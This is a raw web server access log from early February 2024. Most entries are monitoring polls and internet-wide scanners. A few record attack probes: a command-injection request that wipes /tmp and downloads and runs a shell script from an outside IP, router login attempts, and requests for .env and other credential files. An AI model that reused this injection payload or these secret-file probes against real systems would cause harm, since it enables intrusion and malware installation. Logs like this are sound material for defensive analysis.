212.91.246.72 - - [02/Feb/2024:22:38:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:40:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:41:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:42:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.91.127.217 - - [02/Feb/2024:22:43:09 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Feb/2024:22:43:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:44:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:45:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:46:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:47:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.221 - - [02/Feb/2024:22:48:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.221 - - [02/Feb/2024:22:48:02 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.221 - - [02/Feb/2024:22:48:02 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Feb/2024:22:48:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:49:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:50:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:51:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:52:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:53:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:54:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.121 - - [02/Feb/2024:22:54:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
167.248.133.36 - - [02/Feb/2024:22:54:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.36 - - [02/Feb/2024:22:54:43 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.36 - - [02/Feb/2024:22:54:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Feb/2024:22:55:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:56:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:57:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:58:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:22:59:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:00:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:01:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.91.127.217 - - [02/Feb/2024:23:01:37 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
78.153.140.175 - - [02/Feb/2024:23:01:50 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [02/Feb/2024:23:01:54 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Feb/2024:23:02:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:03:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:04:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:05:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:06:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:07:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.146.62.139 - - [02/Feb/2024:23:07:55 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+80.91.223.136/reallynightmare.sh;chmod+777+*;sh+reallynightmare.sh?jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [02/Feb/2024:23:08:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:09:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:10:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.54 - - [02/Feb/2024:23:11:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [02/Feb/2024:23:11:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.51 - - [02/Feb/2024:23:11:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.51 - - [02/Feb/2024:23:11:38 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.51 - - [02/Feb/2024:23:11:38 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Feb/2024:23:12:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.91.127.217 - - [02/Feb/2024:23:13:14 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Feb/2024:23:13:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:14:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:15:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.216 - - [02/Feb/2024:23:16:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.216 - - [02/Feb/2024:23:16:00 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.216 - - [02/Feb/2024:23:16:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Feb/2024:23:16:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:17:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:18:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:19:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:20:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.96.79.166 - - [02/Feb/2024:23:21:13 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Feb/2024:23:21:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:22:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:23:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:24:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:25:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
191.96.79.166 - - [02/Feb/2024:23:25:51 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Feb/2024:23:26:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:27:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:29:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:30:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:31:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:32:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:33:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [02/Feb/2024:23:34:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2024:23:34:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [02/Feb/2024:23:34:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2024:23:35:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:36:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:37:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.58.58.37 - - [02/Feb/2024:23:38:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Feb/2024:23:38:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:39:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:40:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [02/Feb/2024:23:40:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2024:23:41:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:42:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:43:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [02/Feb/2024:23:43:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2024:23:44:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:45:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:46:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:47:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:48:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.23 - - [02/Feb/2024:23:48:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
191.96.79.166 - - [02/Feb/2024:23:49:15 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Feb/2024:23:49:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:50:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:51:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.49 - - [02/Feb/2024:23:52:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.49 - - [02/Feb/2024:23:52:24 +0100] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Feb/2024:23:52:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:53:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:54:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:55:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:56:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:57:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:58:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2024:23:59:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.36.105 - - [03/Feb/2024:00:01:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/561.45 (KHTML, like Gecko) Chrome/73.0.2564 Safari/537.36"
165.154.36.105 - - [03/Feb/2024:00:01:18 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 7_1_1; Win64; x64) AppleWebKit/542.47 (KHTML, like Gecko) Chrome/103.0.2306 Safari/537.36"
165.154.36.105 - - [03/Feb/2024:00:01:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 8_1_1) AppleWebKit/600.47 (KHTML, like Gecko) Chrome/54.0.743 Safari/537.36"
165.154.36.105 - - [03/Feb/2024:00:01:19 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 7_0_2; Win64; x64) AppleWebKit/550.36 (KHTML, like Gecko) Chrome/61.0.2095 Safari/537.36"
165.154.36.105 - - [03/Feb/2024:00:01:20 +0100] "GET /axis2-admin/ HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.36.105 - - [03/Feb/2024:00:01:20 +0100] "GET /axis2/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
165.154.36.105 - - [03/Feb/2024:00:01:23 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
146.19.24.23 - - [03/Feb/2024:00:02:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
142.4.218.114 - - [03/Feb/2024:00:10:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
191.96.79.166 - - [03/Feb/2024:00:14:58 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
213.32.39.38 - - [03/Feb/2024:00:15:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
94.156.65.188 - - [03/Feb/2024:00:16:47 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "GET /?pp=env HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "GET /app/config/parameters.yml HTTP/1.1" 404 330 "-" "Go-http-client/1.1"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
94.156.65.188 - - [03/Feb/2024:00:16:49 +0100] "GET /appsettings.json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
191.96.79.166 - - [03/Feb/2024:00:23:41 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
61.31.104.40 - - [03/Feb/2024:00:38:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
185.134.22.149 - - [03/Feb/2024:00:46:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 infrawatch/0.1"
185.134.22.149 - - [03/Feb/2024:00:46:37 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 infrawatch/0.1"
185.134.22.149 - - [03/Feb/2024:00:46:37 +0100] "GET /Ep1v HTTP/1.1" 404 309 "-" "Mozilla/5.0 infrawatch/0.1"
185.134.22.149 - - [03/Feb/2024:00:46:37 +0100] "GET /GWqN HTTP/1.1" 404 309 "-" "Mozilla/5.0 infrawatch/0.1"
146.19.24.23 - - [03/Feb/2024:00:50:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.227.254.8 - - [03/Feb/2024:00:52:15 +0100] "\x03" 501 316 "-" "-"
157.254.236.81 - - [03/Feb/2024:00:53:18 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
157.254.236.81 - - [03/Feb/2024:00:53:18 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
167.248.133.125 - - [03/Feb/2024:00:54:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.125 - - [03/Feb/2024:00:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.125 - - [03/Feb/2024:00:54:41 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.125 - - [03/Feb/2024:00:54:41 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
146.19.24.23 - - [03/Feb/2024:00:57:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.106 - - [03/Feb/2024:01:00:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.106 - - [03/Feb/2024:01:00:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
162.216.149.180 - - [03/Feb/2024:01:03:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.149.208 - - [03/Feb/2024:01:04:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.105 - - [03/Feb/2024:01:05:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
146.19.24.23 - - [03/Feb/2024:01:05:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [03/Feb/2024:01:11:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.149.5 - - [03/Feb/2024:01:11:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.172.21 - - [03/Feb/2024:01:15:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [03/Feb/2024:01:18:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [03/Feb/2024:01:19:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.181.223 - - [03/Feb/2024:01:19:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
177.66.105.167 - - [03/Feb/2024:01:24:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
